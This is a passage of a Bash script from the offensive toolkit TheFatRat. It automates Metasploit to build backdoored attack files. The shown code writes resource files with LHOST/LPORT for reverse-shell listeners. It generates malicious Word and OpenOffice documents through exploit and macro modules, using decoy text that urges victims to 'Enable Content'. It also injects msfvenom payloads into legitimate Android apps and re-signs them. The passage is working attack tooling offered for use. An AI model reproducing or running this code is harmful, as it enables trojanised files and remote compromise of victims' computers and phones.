address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - spinlong - echo - echo -e $okegreen"" - read -p ' Set LHOST IP: ' yourip - echo "" - read -p ' Set LPORT: ' yourport - invalid1 - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n " Press [ENTER] key to return to menu ." - read inp - clisteners - fi - echo set LHOST $yourip >> "temp/meterpreter_android.rc" - echo set LPORT $yourport >> "temp/meterpreter_android.rc" - echo set ExitOnSession false >> "temp/meterpreter_android.rc" - echo exploit -j >> "temp/meterpreter_android.rc" - echo "" - echo -e $okegreen " Do you want to save this configuration to use in future ?" - echo "" - echo -ne " Choose y/n :" ;tput sgr0 - read svl - case $svl in - y|Y|Yes|YES|yes) - echo "" - echo -e $okegreen " Write the name for this config. (ex: android-config)" - echo "" - echo -ne $cyan " Filename : " ;tput sgr0 - read fln - -#empty input then save as default name - if [ -z $fln ] - then - cp $path/temp/meterpreter_android.rc $list/android-config.rc >/dev/null 2>&1 - echo " Empty input detected , configuration file as android-config.rc " - echo " to: $list/android-config.rc" - echo "" - echo -e $yellow "" - echo " To load this configuration press on this menu 5 and select android.rc" - echo "" - echo -e $okegreen "" - echo -ne $okegreen" Press [ENTER] key to return to menu ." - read continue - clisteners - fi - -#input detected - cp $path/temp/meterpreter_android.rc $list/$fln.rc >/dev/null 2>&1 - echo " Configuration file saved as $fln.rc " - echo " to: $list/$fln.rc" - echo "" - echo -e $yellow "" - echo " To load this configuration press on this menu 5 and select $fln.rc" - echo "" - echo -e $okegreen "" - echo -ne $okegreen" Press [ENTER] key to return to menu . " - read continue - clisteners - ;; - n|no|No|NO) - echo -e $okegreen "" - echo -ne $okegreen" Press [ENTER] key to return to menu . " - read continue - clisteners - ;; - *) - echo "" - echo -e $red " Invalid Input" - echo -e $okegreen "" - echo -ne $okegreen" Press [ENTER] key to return to menu . " - read continue - clisteners -;; -esac - - - elif test $fatrat1 == '5' - then - echo "" -# do an ls command on listeners folder to search .rc files , and count them - lit=`ls -1 $list/*.rc 2>/dev/null | wc -l` -#If on last count there is more that 0 files then proceed - if [ $lit != 0 ] - then - echo -e $orange " +-------------------------+" - echo -e $orange " |$okegreen Current saved listeners$orange |" - echo -e $orange " +-------------------------+" - # Rc files detected in listeners folder , print their names - for liste in config/listeners/*.rc; do - echo ${liste##*/} - done - echo "" - echo -e $orange " +-------------------------+" - echo "" - echo -e $okegreen " Write the listener config file you want to load in msfconsole" - echo "" - echo -ne " Filename : ";tput sgr0 - read fname - #case user do not input any value then return to menu listeners - if [ -z $fname ] - then - clear - clisteners - fi - #Check if the input rc from user in list really exists - if [ ! -f $list/$fname ] - then - echo "" - echo -e $red " The filename you wrote ($fname) do not exist in this list :" - echo "" - echo -e $orange " +-------------------------+" - echo -e $orange " |$okegreen Current saved listeners$orange |" - echo -e $orange " +-------------------------+" - echo -e $okegreen "" - # rc file did not exists , print again the current list and return to listeners menu - for liste in config/listeners/*.rc; do - echo ${liste##*/} - done - echo "" - echo -e $yellow " Make sure you write the correct filename to load" - echo "" - echo -e $okegreen " Press [ENTER] key to return to menu" - read nfln - clear - clisteners - fi - #rc filename input exists , load msfconsole with that config - xterm -fa monaco -fs 13 -bg black -e $msfconsole -r $list/$fname - clear - menu - else - #no rc files were detected in listeners folder - echo -e $yellow " No listeners configuration files were found." - echo "" - echo -e $okegreen " Press [ENTER] key to return to menu" - read nfln - clear - clisteners - fi - - elif test $fatrat1 == '6' - then - clear - menu - else - echo -e " Incorrect Number" - fi - echo -n -e " Do you want exit Fatrat ? ( y/n ) : " - read back - case $back in -y|Y|Yes|YES|yes) -clear -exit -;; -n|N|No|NO|no) -clisteners -;; -*) -clisteners -;; -esac - -} - -function microsploit() { -#metasploit modules -#microsoft metasploit packet auto create backdoor macro attack -#code by edo maland > screetsec -#part of fatrat feature -#compatible with metasploit metasploit v4.14.0-dev { new payload in metasp 2017 like macro} -rm -rf $msploit >/dev/null 2>&1 - -APPNAME='Microsfot Metasploit Packet [ Easy ]' -VERSION='1.0.0' -NAME='Screetsec - Edo Malad ' -CODENAME='Mario Bros' - - clear - echo -e $red" <==============================================>" - echo -e $white" ||$okegreen _____ _ _____ _ _ _ $white||" - echo -e $white" ||$okegreen | |_|___ ___ ___| __|___| |___|_| |_ $white||" - echo -e $white" ||$okegreen | | | | | _| _| . |__ | . | | . | | _| $white||" - echo -e $white" ||$okegreen |_|_|_|_|___|_| |___|_____| _|_|___|_|_| $white||" - echo -e $white" ||$okegreen | | $white||" - echo -e $red" <===================================================>" - echo -e "\t$white|| "$white" |=| "$okegreen"$APPNAME $white||" - echo -e "\t|| $white |=| "$okegreen"Version : $VERSION \t\t $white ||" - echo -e "\t|| $white |=| "$okegreen"Code by : $NAME $white || " - echo -e "\t|| $white |=| "$okegreen"Codename: $CODENAME $white \t\t || " - echo -e $white"\t||"$red"============================================$white||\n" - echo -e $white" |"$okegreen"1$white| "$cyan"Microsoft Stack overflow in MSCOMCTL.OCX" - echo -e $white" |"$okegreen"2$white| "$cyan"The Microsoft Office Macro on Windows " - echo -e $white" |"$okegreen"3$white| "$cyan"The Microsoft Office Macro on Mac OS X " - echo -e $white" |"$okegreen"4$white| "$cyan"Apache OpenOffice on Windows (PSH)" - echo -e $white" |"$okegreen"5$white| "$cyan"Apache OpenOffice on Linux/OSX (Python)" - echo -e $white" |"$okegreen"6$white| "$cyan"Exit\n" - -# Seems to fix some metasploit bugs -rm -rf ~/.msf4/local/* >/dev/null 2>&1 -echo -e $okegreen" ┌─["$red"TheFatRat$okegreen]──[$red~$okegreen]─["$yellow"microsploit$okegreen]:" -echo -ne $okegreen" └─────► " ;tput sgr0 -read choice -case $choice in - 1) - echo -e $red" Worked on Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] " - echo -e $okegreen"" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0 - read fira - invalid - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n "Press [ENTER] key to return to menu ." - read inp - microsploit - fi - spinlong - echo "" - pldwin - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - rm -rf $path/temp/* >/dev/null 2>&1 - touch $meterp - echo "use exploit/windows/fileformat/ms12_027_mscomctl_bof" >$meterp - echo "set PAYLOAD $payload" >> $meterp - echo "set LHOST $yourip" >> $meterp - echo "set LPORT $yourport" >> $meterp - echo "set FILENAME $fira.doc" >> $meterp - echo "exploit" >> $meterp - msploitr - msft="$path/temp/msff" - echo "$fira.doc" > "$msft" - chmod +x "$path/grab" > /dev/null 2>&1 - -#On this option grab script must be used to get the generated exploit by msfconsole -#With option on msfconsole exit -y , msfconsole is not able to generate the doc file properly - - gnome-terminal -t "grab" --geometry=600x400 --working-directory="$path" -e "bash -c '$path/grab.sh'; bash" - xterm -T "Microsploit" -geometry 110x23 -e "$msfconsole -r $meterp | tee temp/xterm.tmp" - rm -rf $meterp >/dev/null 2>&1 - rm -rf $path/temp/msff >/dev/null 2>&1 - cat $path/temp/xterm.tmp | while read LINE - do - echo $LINE >> $msploit - done - rm -rf $path/temp/xterm.tmp >/dev/null 2>&1 - echo -e $okegreen"" - fidoc=$output/$fira.doc - if [ -f "$fidoc" ] - then - echo -e $yellow" Backdoor doc Saved To : $output/$fira.doc " - echo -e - read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key - microsploit - else - echo -e $red "There was a problem in the creation of your Backdoor DOC , -check $path/logs/msploit.log for more information about the error ." - echo -e $green "" - read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key - microsploit -fi - ;; - -2) - echo -e $red"\n Worked on Microsoft Office on Windows " - echo -e $okegreen"" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" -if [ ! -f "$defcon" ] -then -yourip="" -yourport="" -fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi -echo "" - echo -ne $okegreen " Enter the base name for output files : " ;tput sgr0 - read fira -invalid -if [ $err == "1" ] -then -echo -e $okegreen "" -echo -n "Press [ENTER] key to return to menu ." -read inp -microsploit -fi - echo "" - #setup body - echo -ne $okegreen " Enter the message for the document body (ENTER = default) : " ;tput sgr0 - read bodys - #echo $bodys - if [[ "$bodys" == "" ]]; then - bodys="Contents of this document are protected. Please click Enable Content to continue." - fi - #setupexe - echo"" - echo -ne $okegreen " Are u want Use custom exe file backdoor ( y/n ): " ;tput sgr0 - read exe - if [ $exe != 'y' ] && [ $exe != 'Y' ] - then - #payload n - spinlong - echo "" - pldwin - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - rm -rf $path/temp/* >/dev/null 2>&1 - touch $meterp - echo "use exploit/multi/fileformat/office_word_macro" >$meterp - echo "set PAYLOAD $payload" >> $meterp - echo "set LHOST $yourip" >> $meterp - echo "set LPORT $yourport" >> $meterp - echo "set FILENAME $fira.docm" >> $meterp - echo "set BODY $bodys" >> $meterp - echo "exploit" >> $meterp - echo "exit -y" >> $meterp - msploitr - xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp" - rm -rf $meterp >/dev/null 2>&1 - cat $path/temp/xterm.tmp | while read LINE - do - echo $LINE >> $msploit - done - rm -rf $path/temp/xterm.tmp >/dev/null 2>&1 - echo "" - mv ~/.msf4/local/$fira.docm $output/$fira.docm >>$msploit 2>&1 - echo -e $okegreen"" - - fidoc=$output/$fira.docm - if [ -f "$fidoc" ] - then - echo -e $yellow" Backdoor doc Saved To : $output/$fira.docm " - echo -e - read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key - microsploit - else - echo -e $red "There was a problem in the creation of your Backdoor DOC , -check $path/logs/msploit.log for more information about the error ." - echo -e $green "" - read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key - microsploit -fi - - elif [ $exe != 'n' ] && [ $exe != 'N' ] - then - #payload y - selexe - echo "" - pldwin - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - rm -rf $path/temp/* >/dev/null 2>&1 - touch $meterp - echo "use exploit/multi/fileformat/office_word_macro" >$meterp - echo "set PAYLOAD $payload" >> $meterp - echo "set LHOST $yourip" >> $meterp - echo "set LPORT $yourport" >> $meterp - echo "set FILENAME $fira.docm" >> $meterp - echo "set BODY $bodys" >> $meterp - echo "set EXE::Custom $exef" >> $meterp - echo "exploit" >> $meterp - echo "exit -y" >> $meterp - msploitr - xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp" - rm -rf $meterp >/dev/null 2>&1 - cat $path/temp/xterm.tmp | while read LINE - do - echo $LINE >> $msploit - done - rm -rf $path/temp/xterm.tmp >/dev/null 2>&1 - echo "" - mv ~/.msf4/local/$fira.docm $output/$fira.docm >>$msploit 2>&1 - echo "" - - fidoc=$output/$fira.docm - if [ -f "$fidoc" ] - then - echo -e $yellow" Backdoor doc Saved To : $output/$fira.docm " - echo -e - read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key - microsploit - else - echo -e $red "There was a problem in the creation of your Backdoor DOC , -check $path/logs/msploit.log for more information about the error ." - echo -e $green "" - read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key - microsploit -fi -fi -;; - -3) - echo -e $red" Worked on Libre Office on Mac ( Python ) " - echo -e $okegreen"" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" -if [ ! -f "$defcon" ] -then -yourip="" -yourport="" -fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - echo -ne $okegreen " Enter the base name for output files : " ;tput sgr0 - read fira -invalid -if [ $err == "1" ] -then -echo -e $okegreen "" -echo -n "Press [ENTER] key to return to menu ." -read inp -microsploit -fi - echo "" - #setup body - echo -ne $okegreen " Enter the message for the document body (ENTER = default) : " ;tput sgr0 - read bodys - #echo $bodys - if [[ "$bodys" == "" ]]; then - bodys="Contents of this document are protected. Please click Enable Content to continue." - #echo $bodys - fi - #setupexe - - echo"" - echo -ne $okegreen " Are u want Use custom exe file backdoor ( y/n ): " ;tput sgr0 - read exe - if [ $exe != 'y' ] && [ $exe != 'Y' ] - then - #payload n - echo "" - spinlong - pldmac - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - rm -rf $path/temp/* >/dev/null 2>&1 - touch $meterp - echo "use exploit/multi/fileformat/office_word_macro" >$meterp - echo "set PAYLOAD $payload" >> $meterp - echo "set LHOST $yourip" >> $meterp - echo "set LPORT $yourport" >> $meterp - echo "set FILENAME $fira.docm" >> $meterp - echo "set BODY $bodys" >> $meterp - echo "set target 1" >> $meterp - echo "exploit" >> $meterp - echo "exit -y" >> $meterp - msploitr - xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp" - rm -rf $meterp >/dev/null 2>&1 - cat $path/temp/xterm.tmp | while read LINE - do - echo $LINE >> $msploit - done - rm -rf $path/temp/xterm.tmp >/dev/null 2>&1 - echo "" - mv ~/.msf4/local/$fira.docm $output/$fira.docm >>$msploit 2>&1 - echo -e $okegreen"" - - fidoc=$output/$fira.docm - if [ -f "$fidoc" ] - then - echo -e $yellow" Backdoor doc Saved To : $output/$fira.docm " - echo -e - read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key - microsploit - else - echo -e $red "There was a problem in the creation of your Backdoor DOC , -check $path/logs/msploit.log for more information about the error ." - echo -e $green "" - read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key - microsploit -fi - elif [ $exe != 'n' ] && [ $exe != 'N' ] - then - #payload y - selexe - fi - pldmac - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - rm -rf $path/temp/* >/dev/null 2>&1 - touch $meterp - echo "use exploit/multi/fileformat/office_word_macro" >$meterp - echo "set PAYLOAD $payload" >> $meterp - echo "set LHOST $yourip" >> $meterp - echo "set LPORT $yourport" >> $meterp - echo "set FILENAME $fira.docm" >> $meterp - echo "set BODY $bodys" >> $meterp - echo "set set EXE::Custom $exef" >> $meterp - echo "set target 1" >> $meterp - echo "exploit" >> $meterp - echo "exit -y" >> $meterp - msploitr - xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp" - rm -rf $meterp >/dev/null 2>&1 - cat $path/temp/xterm.tmp | while read LINE - do - echo $LINE >> $msploit - done - rm -rf $path/temp/xterm.tmp >/dev/null 2>&1 - echo "" - mv ~/.msf4/local/$fira.docm $output/$fira.docm >>$msploit 2>&1 - echo -e $okegreen"" - fidoc=$output/$fira.docm - if [ -f "$fidoc" ] - then - echo -e $yellow" Backdoor doc Saved To : $output/$fira.docm " - echo -e - read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key - microsploit - else - echo -e $red "There was a problem in the creation of your Backdoor DOC , -check $path/logs/msploit.log for more information about the error ." - echo -e $green "" - read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key - microsploit -fi -;; - -4) - echo -e $red" Apache OpenOffice on Windows (PSH) " - echo -e $okegreen"" - echo -e $okegreen"" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" -if [ ! -f "$defcon" ] -then -yourip="" -yourport="" -fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - echo -ne $okegreen " Enter the base name for output files : " ;tput sgr0 - read fira -invalid -if [ $err == "1" ] -then -echo -e $okegreen "" -echo -n "Press [ENTER] key to return to menu ." -read inp -microsploit -fi - echo "" - #setup body - echo -ne $okegreen " Enter the message for the document body (ENTER = default) : " ;tput sgr0 - read bodys - #echo $bodys - if [[ "$bodys" == "" ]]; then - bodys="Contents of this document are protected. Please click Enable Content to continue." - #echo $bodys - fi - - echo "" - spinlong - pldwin - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - rm -rf $path/temp/* >/dev/null 2>&1 - touch $meterp - echo "use exploit/multi/misc/openoffice_document_macro" >$meterp - echo "set target 0" >> $meterp - echo "set PAYLOAD $payload" >> $meterp - echo "set LHOST $yourip" >> $meterp - echo "set LPORT $yourport" >> $meterp - echo "set FILENAME $fira.odt" >> $meterp - echo "set BODY $bodys" >> $meterp - echo "exploit" >> $meterp - msploitr - msft="$path/temp/msff" - echo "$fira.odt" > "$msft" - chmod +x "$path/grab" > /dev/null 2>&1 - -#On this option grab script must be used to get the generated exploit by msfconsole -#With option on msfconsole exit -y , msfconsole is not able to generate the odt file properly - gnome-terminal -t "grab" --geometry=600x400 --working-directory="$path" -e "bash -c '$path/grab.sh'; bash" - xterm -T "Microsploit" -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp" - rm -rf $meterp >/dev/null 2>&1 - rm -rf $msff >/dev/null 2>&1 - cat $path/temp/xterm.tmp | while read LINE - do - echo $LINE >> $msploit - done - rm -rf $path/temp/xterm.tmp >/dev/null 2>&1 - echo -e $okegreen"" - fidoc=$output/$fira.odt - if [ -f "$fidoc" ] - then - echo -e $yellow" Backdoor doc Saved To : $output/$fira.odt " - echo -e - read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key - microsploit - else - echo -e $red "There was a problem in the creation of your Backdoor DOC , -check $path/logs/msploit.log for more information about the error ." - echo -e $green "" - read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key - microsploit -fi -;; - - 5) - echo -e $red" Apache OpenOffice on Linux (PSH) " - echo -e $okegreen"" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" -if [ ! -f "$defcon" ] -then -yourip="" -yourport="" -fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - echo -ne $okegreen " Enter the base name for output files : " ;tput sgr0 - read fira -invalid -if [ $err == "1" ] -then -echo -e $okegreen "" -echo -n "Press [ENTER] key to return to menu ." -read inp -microsploit -fi - echo "" - #setup body - echo -ne $okegreen " Enter the message for the document body (ENTER = default) : " ;tput sgr0 - read bodys - #echo $bodys - if [[ "$bodys" == "" ]]; then - bodys="Contents of this document are protected. Please click Enable Content to continue." - #echo $bodys - fi - - echo "" - spinlong - pldmul - spinlong - echo "" - gboor - spinlong - echo "" - rm -rf $path/temp/* >/dev/null 2>&1 - touch $meterp - echo "use exploit/multi/misc/openoffice_document_macro" >$meterp - echo "set target 1" >> $meterp - echo "set PAYLOAD $payload" >> $meterp - echo "set LHOST $yourip" >> $meterp - echo "set LPORT $yourport" >> $meterp - echo "set FILENAME $fira.odt" >> $meterp - echo "set BODY $bodys" >> $meterp - echo "exploit" >> $meterp - msploitr - msft="$path/temp/msff" - echo "$fira.odt" > "$msft" - chmod +x "$path/grab" > /dev/null 2>&1 - -#On this option grab script must be used to get the generated exploit by msfconsole -#With option on msfconsole exit -y , msfconsole is not able to generate the odt file properly - gnome-terminal -t "grab" --geometry=600x400 --working-directory="$path" -e "bash -c '$path/grab.sh'; bash" - xterm -T "Microsploit" -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp" - rm -rf $meterp >/dev/null 2>&1 - rm -rf $path/temp/msff >/dev/null 2>&1 - cat $path/temp/xterm.tmp | while read LINE - do - echo $LINE >> $msploit - done - rm -rf $path/temp/xterm.tmp >/dev/null 2>&1 - echo "" - echo -e $okegreen"" - fidoc=$output/$fira.odt - if [ -f "$fidoc" ] - then - echo -e $yellow" Backdoor doc Saved To : $output/$fira.odt " - echo -e - read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key - microsploit - else - echo -e $red "There was a problem in the creation of your Backdoor DOC , -check $path/logs/msploit.log for more information about the error ." - echo -e $green "" - read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key - microsploit -fi -;; - 6) - clear - menu -;; -*) -microsploit -;; -esac -} -function tstapk() { -rm -rf "$path/temp/tstapk" >/dev/null 2>&1 -rm -rf "$path/temp/tstapk.apk" >/dev/null 2>&1 -$apktool d "$path/temp/app.apk" -o "$path/temp/tstapk" >/dev/null 2>&1 -if [[ ! -d "$path/temp/tstapk" ]] -then -echo -e "$red""Error" -echo -e "$red""Apktool in unable to decompile this apk" -echo "" -read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key -clear -menu -fi -$apktool b "$path/temp/tstapk" -o "$path/temp/tstapk.apk" >/dev/null 2>&1 -if [[ ! -f "$path/temp/tstapk.apk" ]] -then -echo -e "$red""Error" -echo -e "$red""Apktool in unable to recompile this apk" -echo -e "$okegreen""" -read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key -clear -menu -fi -echo -e "$okegreen""Done" -echo "" -rm -rf "$path/temp/tstapk" >/dev/null 2>&1 -rm -rf "$path/temp/tstapk.apk" >/dev/null 2>&1 -} -#EMBEDBACKDOORAPK -function embedapk() { -resize -s 45 86 > /dev/null -clear -echo -e $okegreen"[ ]===========================================================================$okegreen[ ]" -echo -e $okegreen"[ ]$cyan $okegreen [ ]" -echo -e $okegreen"[ ]$cyan ) ( ) ) ( ( ) $okegreen [ ] "; -echo -e $okegreen"[ ]$cyan ( ( ( ( /( )\ ) ( /( ( /( )\ ) )\ ) ( /( ( $okegreen [ ] "; -echo -e $okegreen"[ ]$cyan )\ )\ )\ )\())(()/( )\()) )\()) (()/((()/( )\()) )\ ) $okegreen[ ] "; -echo -e $okegreen"[ ]$cyan ((_)((((_)( (((_) |((_)\ /(_)) ((_)\ ((_)\ /(_))/(_))((_)\ (()/( $okegreen[ ] "; -echo -e $okegreen"[ ]$cyan (_) )\_ )\ )\___ |_ ((_)(_))_ ((_) ((_) (_)) (_)) _((_) /(_))_ $okegreen[ ] "; -echo -e $okegreen"[ ]$cyan | _ ) (_)_\(_)((/ __|| |/ / | \ / _ \ / _ \ | _ \|_ _| | \| |(_)) __|$okegreen[ ] "; -echo -e $okegreen"[ ]$cyan | _ \ / _ \ | (__ ' < | |) || (_) || (_) || / | | | .\` | | (_ |$okegreen[ ] "; -echo -e $okegreen"[ ]$cyan |___/ /_/ \_\ \___| _|\_\ |___/ \___/ \___/ |_|_\|___| |_|\_| \___|$okegreen[ ]"; -echo -e $okegreen"[ ]$okegreen===========================================================================$okegreen[ ]" -echo -e $okegreen"[ ]$red Embed a Metasploit Payload in an original .apk files $okegreen[ ]" -echo -e $okegreen"[ ]$red This script is POC for injecting metasploit payload arbitary apk backdoor $okegreen[ ]" -echo -e $okegreen"[ ]$okegreen===========================================================================$okegreen[ ]" -echo "" -echo "Cleaning Temp files" -rm -rf temp/* -sleep 2 -echo "Done!" -echo -e $okegreen"" -echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" -echo -e $yellow " Your public IP address is : $publicip" -echo -e $yellow " Your Hostname is : $hostn" -if [ ! -f "$defcon" ] -then -yourip="" -yourport="" -fi -echo -e $okegreen"" -if [ -z "$yourip" ]; then -read -p ' Set LHOST IP: ' yourip -fi -echo -e $okegreen "" -if [ -z "$yourport" ]; then -read -p ' Set LPORT: ' yourport -fi -invalid1 -if [ $err == "1" ] -then -echo -e $okegreen "" -echo -n "Press [ENTER] key to return to menu ." -read inp -embedapk -fi -echo "" -selapk -#cp user selected apk to temp folder -cp $exef $path/temp/app.apk >/dev/null 2>&1 -apkt="$path/temp/app.apk" -# check if apk was copyed succefully -if [ ! -f $apkt ]; then - echo "" -echo -e $red "There was a problem copying your apk file to final destination ." - read -rsp $'Press [ENTER] key to continue to return to fatrat menu\n' -n 1 key -menu - fi - -echo "" -echo -ne "$okegreen""Testing your apk before next step ..." -tstapk -#go to payload android menu -pldand -echo "" -echo "" -spinlong -echo "" -sleep 1 -#select tool to build apk rat -echo -e $orange "+-------------------------------------+" -echo -e $orange "|$white [$okegreen 1$white ]$yellow Use Backdoor-apk 0.2.4a$orange |" -echo -e $orange "|$white [$okegreen 2$white ]$yellow Use old Fatrat method$orange |" -echo -e $orange "|$white [$okegreen 3$white ]$yellow Use MsfVenom Embedded method$orange |" -echo -e $orange "+-------------------------------------+" -echo "" -echo -ne $cyan "Select Tool to create apk : ";tput sgr0 -read apkto -case $apkto in -1) -echo "" -spinlong -outf="app_backdoor.apk" -gboor2 -# remove any existent apkconfig file and create a new one with the data for backdoor_apk to read -rm -f $apkconfig >/dev/null 2>&1 -touch $apkconfig -echo "$path/temp/app.apk" > $apkconfig -echo "$path/temp/Rat.apk" >> $apkconfig -echo $payload >> $apkconfig -echo $yourip >> $apkconfig -echo $yourport >> $apkconfig -./backdoor_apk -echo "" -sleep 2 - read -rsp $'Press [ENTER] key to continue to return to fatrat menu\n' -n 1 key -clear -menu -;; - -2) -echo -e $okegreen "" -spinlong - -#removing previous logs -rm -rf $log >/dev/null 2>&1 -touch $log >/dev/null 2>&1 - -outf="app_backdoored.apk" -gboor2 -echo -e $okegreen "" -echo "[*] Creating RAT payload with msfvenom" - -#Creating payload and storing info in logfile -$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $path/temp/payload.apk >>$log /dev/null 2>&1 - -#Checking if payload exists -pld=$path/temp/payload.apk -if [ -f "$pld" ] -then -echo "[✔] Done!" -else -echo -e $red "" -echo "[x] There was an error in the creation of the payload . -Check log file at : $log" -rm -rf temp/* > /dev/null 2>&1 -read -rsp $'Press [ENTER] key to continue to return to fatrat menu\n' -n 1 key -clear -menu -fi -sleep 2 -echo "[*] Creating a Valid Certificate" - -#Creating certificate and storing info in logfile -$keytool -genkey -v -keystore $path/temp/debug.keystore -storepass android -alias androiddebugkey -keypass android -dname "CN=Android Debug,O=Android,C=US" -keyalg RSA -keysize 2048 -validity 10000 >>$log 2>&1 - -#Checking if certificate was created -cert=$path/temp/debug.keystore -if [ -f "$cert" ] -then -echo "[✔] Done!" -else -echo -e $red "" -echo "[x] There was an error creating a valid certificate . -Check log file at : $log" -rm -rf temp/* > /dev/null 2>&1 -menu -fi -sleep 2 - -echo "[*] Starting the merging process of RAT with the APK you selected" -echo -e $okegreen "" - -#Starting the process of inserting the payload into original apk file -ruby $apkembed $path/temp/app.apk -sleep 2 - -echo -e $okegreen "" -#Checking if backdoor apk was created succefully -fiapk=$path/temp/app_backdoored.apk -if [ -f "$fiapk" ] -then -echo "[✔] Done!" -sleep 1 -echo "[*] Signing your Rat APK" -$sign -verbose -keystore $path/temp/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA $path/temp/app_backdoored.apk androiddebugkey >>$log 2>&1 -echo "[✔] Done!" -else -echo $red "" -echo "[x] There was an error in the creation of your RAT APK file , the possible reasons are : -- The architecture of the file is not for android -- The original APK is protected -- It was not possible to inject the payload in the hook you selected (in this case select a different hook point) -Check log file at : $log" -echo -e $okegreen "" -read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key -menu -fi - -#looking if already exists a previous backdoor apk created and renaming it - -ren=`shuf -i 1-1000 -n 1` -back=$output/app_backdoored.apk -if [ -f "$back" ] -then -mv $output/app_backdoored.apk $output/app_backdoored_$ren.apk >>$log 2>&1 -echo -e $yellow "" -echo "[!] FatRat Detected that you already had a previous created backdoor -file in ($output/) with the name app_backdoored.apk ." -echo -e $okegreen "" -echo "[✔] FatRat have renamed your old backdoor to app_backdoored_$ren.apk" - -# Moving apk backdoor to final destination -mv $path/temp/app_backdoored.apk $output/app_backdoored.apk >>$log 2>&1 - -# Removing temp files -rm -rf temp/* > /dev/null 2>&1 -else - - -# Moving apk backdoor to final destination -mv $path/temp/app_backdoored.apk $output/app_backdoored.apk >>$log 2>&1 -rm -rf temp/* > /dev/null 2>&1 -fi - -varopt="$output/app_backdoored.apk" -if [ ! -f $varopt ]; then -echo -e $red "" -echo "[x] There was an error copying your Rat app to final destination . -Check log file at : $log" -rm -rf temp/* > /dev/null 2>&1 -echo -e $okegreen "" - read -rsp $'Press [ENTER] key to continue to return to fatrat menu\n' -n 1 key -menu -fi - -echo -e $green "" -echo "Your payload has been successfully & signed and it is located at : - $output/app_backdoored.apk" -sleep 2 -echo -e $okegreen "" -echo "[*] Removing temporary files" -sleep 2 -rm -rf $path/temp/* >/dev/null 2>&1 -echo "[✔] Done!" -echo "" -crlst -;; -3) -echo "" -echo "---------Backdooring your apk with MSFVenom-----------" -echo "" -$msfvenom -x $apkt -p $payload LHOST=$yourip LPORT=$yourport -o temp/backand.apk -echo "" -echo "-----------------------Finished-----------------------" -echo "" -if 